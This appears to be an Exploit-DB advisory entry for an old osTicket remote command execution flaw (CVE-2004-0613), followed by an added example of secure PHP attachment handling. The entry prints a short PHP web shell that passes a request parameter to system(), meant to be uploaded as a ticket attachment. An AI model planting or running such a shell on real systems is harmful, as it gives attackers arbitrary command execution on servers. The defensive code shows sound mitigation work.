- 18 Dec 2022
- EDB-ID: 24225
- EDB verification: Passed
- Author: GUY PEARCE
- Vulnerability type: WEBAPPS
- Platform: PHP
- CVE: CVE-2004-0613
- Publication date: 2004-06-21
PHP:
source: https://www.securityfocus.com/bid/10586/info
osTicket is reported prone to a remote command execution vulnerability. The issue is reported to present itself because attachments submitted as a part of a support ticket request are stored with a predictable name in a known web accessible location.
<?PHP
echo "<form action = ''><input type = 'text' name = 'cmd' value = '$cmd' size = '75'><BR>";
if (!$cmd)die;
system($cmd);
?>
- Source: www.exploit-db.com
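
The description above blames two properties: the stored attachment name is predictable, and the storage location is served by the web server. The following is an added example of attachment handling that removes both; it is not osTicket code and not part of the original entry. The directory path, allowlist, size limit and function names are assumptions chosen for illustration.

```php
<?php
declare(strict_types=1);

// Added example, not osTicket code. Path, allowlist and limit are assumptions.
const ATTACHMENT_DIR = '/var/lib/helpdesk/attachments'; // hypothetical; outside the web root
const ALLOWED_EXT    = ['txt', 'log', 'pdf', 'png', 'jpg'];
const MAX_BYTES      = 2 * 1024 * 1024;

// Store one $_FILES entry; return the opaque ID to save with the ticket record.
function store_attachment(array $file, string $dir = ATTACHMENT_DIR): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('attachment too large');
    }
    // Allowlist on the final extension; everything else, .php included, is refused.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        throw new RuntimeException('file type not allowed');
    }
    // Server-chosen random name: nothing client-supplied, no extension,
    // so the stored path is neither guessable nor mapped to a script handler.
    $id   = bin2hex(random_bytes(16));
    $dest = $dir . '/' . $id;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store attachment');
    }
    chmod($dest, 0640);
    return $id;
}

// Serve a stored attachment as an inert download; the file is read, never executed.
function send_attachment(string $id, string $displayName, string $dir = ATTACHMENT_DIR): void
{
    if (!preg_match('/\A[0-9a-f]{32}\z/', $id) || !is_file($dir . '/' . $id)) {
        http_response_code(404);
        return;
    }
    $safeName = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($displayName));
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $safeName . '"');
    header('X-Content-Type-Options: nosniff');
    readfile($dir . '/' . $id);
}
```

The original file name is kept only in the ticket database for display, and the caller of `send_attachment` is expected to check that the requesting user may view the ticket before calling it.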